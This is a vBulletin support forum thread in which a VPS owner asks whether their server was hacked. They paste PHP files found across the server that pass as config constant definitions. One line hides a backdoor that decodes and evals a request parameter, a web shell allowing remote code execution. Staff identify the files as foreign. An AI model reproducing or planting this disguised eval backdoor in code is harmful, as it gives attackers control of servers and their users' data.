No announcement yet.

Has my server been hacked?

  • Filter
  • Time
  • Show
Clear All
new posts

  • [CMS] Has my server been hacked?

    I'm investigating a sudden surge in the bandwidth usage this month as I've used 50% of the monthly allocation in 2 days. My SQL server collapsed several times as well. I'm running a VPS so I shouldn't be getting problems from other users.
    Right I've run a suspect file scan and have found a lot of files inserted about a week ago and all of the files are PHP but have different names. An example is that some are called "CREDITS.php news2.class.php LICENSE.php and so on. all the files have the same code though.
    define('REAL_SERVER_ROOT', 'SERVER');
    define('SERVER_ROOT', '.');
    define('SERVER_VERSION', '2.5');
    define('BOOT_DIR', 'bootstrap');
    define('SYSTEM_DIR', 'system');
    define('SYSTEM_CONF_DIR', 'conf');
    define('KERNEL_DIR', 'kernel');
    define('SERVICES_DIR', 'services');
    define('LIBRARIES_DIR', 'libs');
    define('FRAMEWORKS_DIR', 'Frameworks');
    define('IMPLEMENTATIONS_DIR', 'implementations');
    define('EXTERN_DIR', 'extern');
    define('APPS_DIR', 'apps');
    define('USERS_DIR', 'users');
    define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
    define('USERS_CONF_DIR', 'conf');
    define('USERS_FILES_DIR', 'files');
    define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['comment'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
    define('USERS_SHARE_DIR', 'share');
    define('USERS_META_DIR', 'meta');
    define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
    define('WORKGROUPS_DIR', 'workgroups');
    define('WORKGROUPS_CONF_DIR', 'conf');
    define('WORKGROUPS_FILES_DIR', 'files');
    define('WORKGROUPS_METAFILES_DIR', 'metafiles');
    define('WORKGROUPS_META_DIR', 'meta');
    define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
    I'm finding these files in the server root, the cms root, archives in fact almost everywhere.

    My question is was I hacked and if so is there a procedure to clean up Vbulletin please.

  • #2
    Looks like problematic files at first glance. They should be deleted and aren't part of vBulletin. You should contact your hosting provider to see where the files came from.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.


    • #3
      Thanks for the reply. I have contacted my host who are investigating it now. My Vbulletin is up to date so I'm happy that it survived... unfortunately my VBgallery isn't and unlikely to be by the looks of the developers... That makes a weak system
      It's a shame Vbulletin hasn't got a comprehensive gallery...

      Thanks again though Wayne


      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.